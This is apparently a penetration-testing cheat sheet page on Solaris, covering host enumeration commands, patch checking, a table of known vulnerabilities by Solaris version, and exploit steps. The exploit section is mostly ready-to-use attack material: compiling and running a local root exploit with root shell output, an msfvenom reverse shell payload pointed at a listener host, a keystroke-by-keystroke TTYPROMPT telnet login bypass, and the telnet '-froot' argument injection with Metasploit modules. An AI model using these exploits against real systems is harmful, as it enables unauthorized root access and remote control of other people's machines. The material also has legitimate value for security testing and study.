Solaris
Information gathering and exploitation
Enumeration
View patches
showrev -p
Installed packages:
Pkginfo OR pkginfo -x
Host information
uname -a
Show IP interface:
Ifconfig -a
Process list:
/usr/ucb/ps -auxww
Patch check analyser
http://www.par.univie.ac.at/solaris/pca/
Patch Check Advanced (PCA) generates lists of installed and missing patches for Oracle Solaris systems and optionally downloads patches. It resolves dependencies between patches and installs them in correct order. It can be the only tool you ever need for patch management, be it on a single machine or a complete network. Just one perl script, it doesn't need compilation nor installation, and it doesn't need root permissions to run. It works on all versions of Solaris, both SPARC and x86.
Usage:
./pca.pl –f . –l missings
will produce a list of missing patches, the following is an example. Note the ‘.’ Represents the current directory so ensure that the three files are in the same directory.
Common Solaris Vulnerabilities
Solaris 7
sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl
**ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client
sendmail_exec LPD - line printer daemon buffer overflow - allows root
heap_noir DTSPCD - CDE common desktop environment heap overflow TCP port 6112, runs with root
ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root
kcms_readfile kcms / ttdbserverd remote file read (only in msf2)
Solaris 8
sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl
**ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client
sendmail_exec LPD - line printer daemon buffer overflow - allows root
heap_noir DTSPCD - CDE common desktop environment heap overflow TCP port 6112, runs with root
ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root.
no exploit - sadmind_adm_build_path SADMIND - stack buffer overflow in adm_build_path() function.
kcms_readfile kcms / ttdbserverd remote file read (only in msf2)
solaris 9:
sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl
ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root.
sadmind_adm_build_path SADMIND - stack buffer overflow in adm_build_path() function.
kcms_readfile kcms / ttdbserverd remote file read (only in msf2)
Solaris 10
fuser TELNET - authentication bypass through -f command - can be manually exploited
ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root.
Solaris 11
fuser TELNET - authentication bypass through -f command - can be manually exploited
Exploits
Solaris 8 finger
finger '1 2 3 4 5 6 7 8 9 0'@target
Solaris exploits
https://github.com/0xdea/exploits
raptor_passwd
$ gcc raptor_passwd.c -o passwd -ldl -Wall
$./raptor_passwd p@ssw0rd
raptor_passwd.c - passwd circ() local, Solaris/SPARC 8/9
Copyright (c) 2004 Marco Ivaldi <[email protected]>
Using SI_PLATFORM : SUNW,UltraAX-i2 (5.9)
Using stack base : 0xffbffffc
Using var address : 0xffbffb58
Using rwx_mem address : 0xff3f6004
Using sc address : 0xffbfff9c
Using ff address : 0xffbfff58
Using strcpy() address : 0xff3e0288
"Pai Mei taught you the five point palm exploding heart technique?" -- Bill
"Of course." -- Beatrix Kidd0, alias Black Mamba, alias The Bride (KB Vol2)
# id;uname -a;uptime;
uid=0(root) gid=9610(gengrp) egid=3(sys)
SunOS wks1 5.9 Generic sun4u sparc SUNW,UltraAX-i2
1:53pm up 1 day(s), 16:32, 1 user, load average: 0.00, 0.00, 0.01
#
Msfvenom payload
msfvenom -p solaris/x86/shell_reverse_tcp lhost=10.10.14.6 lport=5555 -f elf > /root/Desktop/raj.elf
TTYPROMPT exploit
Solaris TTYPROMPT Security Vulnerability (Telnet)
This vulnerability is very simple to exploit, since it does not require any code to be compiled by an attacker. The vulnerability only requires the attacker to simply define the environment variable TTYPROMPT to a 6-character string, inside telnet. Jonathan believes this overflows an integer inside login, which specifies whether the user has been authenticated (just a guess).
Once connected to the remote host, you must type the username, followed by 64 " c"s, and a literal "\n". You will then be logged in as the user without any password authentication. This should work with any account except root (unless remote root login is allowed).
Example:
coma% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
SunOS 5.8
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: whenever
$ whoami bin
Metasploit:
Solaris in.telnetd TTYPROMPT Buffer Overflow
msf > use exploit/solaris/telnet/ttyprompt
Telnet exploit (fuser)
exploits the argument injection vulnerability in the telnet daemon (in.telnetd) of Solaris 10 and 11.
Command line:
telnet -l "-fbin" target_address
Or also
telnet -l "-froot" 192.168.0.1
Metasploit:
msf > use exploit/solaris/telnet/fuser
Last updated
Was this helpful?